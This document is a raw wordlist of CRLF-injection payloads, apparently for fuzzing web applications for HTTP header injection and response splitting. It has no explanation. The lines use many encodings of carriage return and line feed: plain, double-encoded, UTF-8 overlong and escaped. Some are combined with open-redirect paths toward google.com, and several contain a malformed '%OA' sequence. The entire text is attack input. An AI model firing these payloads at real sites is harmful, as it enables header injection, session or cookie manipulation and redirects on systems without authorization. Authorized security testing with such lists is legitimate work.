%0Acrlfi:injection
%0A%20crlfi:injection
%20%0Acrlfi:injection
%23%OAcrlfi:injection
%E5%98%8A%E5%98%8Dcrlfi:injection
%E5%98%8A%E5%98%8D%0Acrlfi:injection
%3F%0Acrlfi:injection
crlf%0Acrlfi:injection
crlf%0A%20crlfi:injection
crlf%20%0Acrlfi:injection
crlf%23%OAcrlfi:injection
crlf%E5%98%8A%E5%98%8Dcrlfi:injection
crlf%E5%98%8A%E5%98%8D%0Acrlfi:injection
crlf%3F%0Acrlfi:injection
%0Dcrlfi:injection
%0D%20crlfi:injection
%20%0Dcrlfi:injection
%23%0Dcrlfi:injection
%23%0Acrlfi:injection
%E5%98%8A%E5%98%8Dcrlfi:injection
%E5%98%8A%E5%98%8D%0Dcrlfi:injection
%3F%0Dcrlfi:injection
crlf%0Dcrlfi:injection
crlf%0D%20crlfi:injection
crlf%20%0Dcrlfi:injection
crlf%23%0Dcrlfi:injection
crlf%23%0Acrlfi:injection
crlf%E5%98%8A%E5%98%8Dcrlfi:injection
crlf%E5%98%8A%E5%98%8D%0Dcrlfi:injection
crlf%3F%0Dcrlfi:injection
%0D%0Acrlfi:injection
%0D%0A%20crlfi:injection
%20%0D%0Acrlfi:injection
%23%0D%0Acrlfi:injection
\\r\\ncrlfi:injection
\\r\\n%20crlfi:injection
\\r\\n%0D%0Acrlfi:injection
%5cr%5cncrlfi:injection
%E5%98%8A%E5%98%8Dcrlfi:injection
%E5%98%8A%E5%98%8D%0D%0Acrlfi:injection
%3F%0D%0Acrlfi:injection
crlf%0D%0Acrlfi:injection
crlf%0D%0A%20crlfi:injection
crlf%20%0D%0Acrlfi:injection
crlf%23%0D%0Acrlfi:injection
crlf\\r\\ncrlfi:injection
crlf%5cr%5cncrlfi:injection
crlf%E5%98%8A%E5%98%8Dcrlfi:injection
crlf%E5%98%8A%E5%98%8D%0D%0Acrlfi:injection
crlf%3F%0D%0Acrlfi:injection
%0D%0A%09crlfi:injection
crlf%0D%0A%09crlfi:injection
%250Acrlfi:injection
%25250Acrlfi:injection
%%0A0Acrlfi:injection
%25%30Acrlfi:injection
%25%30%61crlfi:injection
%u000Acrlfi:injection
//www.google.com/%2F%2E%2E%0D%0Acrlfi:injection
/www.google.com/%2E%2E%2F%0D%0Acrlfi:injection
/google.com/%2F..%0D%0Acrlfi:injection
/%0Acrlfi:injection
/%0A%20crlfi:injection
/%20%0Acrlfi:injection
/%23%OAcrlfi:injection
/%E5%98%8A%E5%98%8Dcrlfi:injection
/%E5%98%8A%E5%98%8D%0Acrlfi:injection
/%3F%0Acrlfi:injection
/crlf%0Acrlfi:injection
/crlf%0A%20crlfi:injection
/crlf%20%0Acrlfi:injection
/crlf%23%OAcrlfi:injection
/crlf%E5%98%8A%E5%98%8Dcrlfi:injection
/crlf%E5%98%8A%E5%98%8D%0Acrlfi:injection
/crlf%3F%0Acrlfi:injection
/%0Dcrlfi:injection
/%0D%20crlfi:injection
/%20%0Dcrlfi:injection
/%23%0Dcrlfi:injection
/%23%0Acrlfi:injection
/%E5%98%8A%E5%98%8Dcrlfi:injection
/%E5%98%8A%E5%98%8D%0Dcrlfi:injection
/%3F%0Dcrlfi:injection
/crlf%0Dcrlfi:injection
/crlf%0D%20crlfi:injection
/crlf%20%0Dcrlfi:injection
/crlf%23%0Dcrlfi:injection
/crlf%23%0Acrlfi:injection
/crlf%E5%98%8A%E5%98%8Dcrlfi:injection
/crlf%E5%98%8A%E5%98%8D%0Dcrlfi:injection
/crlf%3F%0Dcrlfi:injection
/%0D%0Acrlfi:injection
/%0D%0A%20crlfi:injection
/%20%0D%0Acrlfi:injection
/%23%0D%0Acrlfi:injection
/\\r\\ncrlfi:injection
/ \\r\\n crlfi:injection
/\\r\\n%0D%0Acrlfi:injection
/%5cr%5cncrlfi:injection
/%E5%98%8A%E5%98%8Dcrlfi:injection
